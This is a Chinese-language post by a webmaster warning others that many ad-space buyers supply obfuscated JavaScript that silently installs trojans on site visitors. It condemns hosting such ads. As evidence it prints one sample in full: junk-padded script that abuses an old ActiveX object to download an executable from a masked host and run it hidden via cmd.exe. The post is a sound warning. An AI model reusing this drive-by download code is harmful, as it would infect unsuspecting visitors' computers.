最近我的站流量还可以，所以去几个站上发了 广告为求租的，过来联系的人都有很多，都有N个。但是谈到最近心里确实有点悲哀。 基本都是假惺惺的 说过来收广告，但是分析了下代码基本都是里面有自动下载木马的。一般如果不仔细查找的话不会发现。  因为现在木马一般做的比较隐蔽，都是免杀的。

他们的广告代码都是通过 js里面套js，而且js都是经过 压缩 加密的，现在可以八九不离十的是，如果里面发现有加密的 js，请坚决不要接了，如果你看着这个钱眼红，而出卖全国的网民和出卖自己的良心，可以“心安理得”的去那些收流量的，而且那个价格比假猩猩的来包月的高好几倍到十几倍。但是要知道，赚的这个钱是 “黑钱”。

下面有个例子，网址给隐藏了。

function GnMs(n)
{
 var numberMs = Math.random()*n;
xxxfdfef='fdsafweqfsafwqefqewfasdf';
 return '~Temp'+Math.round(numberMs)+'.tmp';
}
 try
{
 b5fsdafsawfsf='fdsafeqaesfweqfeasff';
 var Bf=document.createElement("object");
 Bf.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
 var Kx=Bf.CreateObject("Microsoft.X"+"MLHTTP","");
 var AS=Bf.CreateObject("Adodb.Stream","");
 b5fsdafsawfsf='fdsafeqaesfweqfeasff';
 b5fsdafsawfsf='fdsafeqaesfweqfeasff';
 AS.type=1;
 b5fsdafsawfsf='fdsafeqaesfweqfeasff';
 Kx.open("GET", 'http://xxxxxxxxxxxxxxxx.vc/s.exe',0);
 b5fsdafsawfsf='fdsafeqaesfweqfeasff';
 Kx.send();
 b5fsdafsawfsf='fdsafeqaesfweqfeasff';
 Ns1=GnMs(9999);
 b5fsdafsawfsf='fdsafeqaesfweqfeasff';
 var cF=Bf.CreateObject("Scripting.FileSystemObject","");
 var NsTmp=cF.GetSpecialFolder(0); Ns1= cF.BuildPath(NsTmp,Ns1); AS.Open();AS.Write(Kx.responseBody);
 AS.SaveToFile(Ns1,2); AS.Close(); var q=Bf.CreateObject("Shell.Application","");
 ok1=cF.BuildPath(NsTmp+'\system32','cmd.exe');
 q.ShELLExecute(ok1,' /c '+Ns1,"","open",0);
 b5fsdafsawfsf='fdsafeqaesfweqfeasff';
}
 catch(adfwefasdf) { adfwefasdf=1; } 

看下 这个就知道了，其他就不用多说了。。。一句话，君子爱财，取之有道。